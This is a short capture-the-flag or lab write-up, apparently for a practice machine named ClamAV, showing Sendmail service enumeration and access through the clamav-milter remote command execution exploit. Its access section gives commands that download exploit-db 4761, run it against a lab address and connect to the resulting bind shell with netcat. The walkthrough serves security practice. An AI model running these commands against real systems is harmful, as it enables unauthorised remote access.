ClamAV

Enumeration

25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.49.112], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info

Sendmail with clamav-milter < 0.91.2 - Remote Command Execution

https://www.exploit-db.com/exploits/4761

Access

$ wget https://www.exploit-db.com/raw/4761 -O black-hole.pl
$ perl black-hole.pl 192.168.112.42
$ nc -v 192.168.112.42 31337

PreviousBratarina NextExfiltrated

Last updated 3 years ago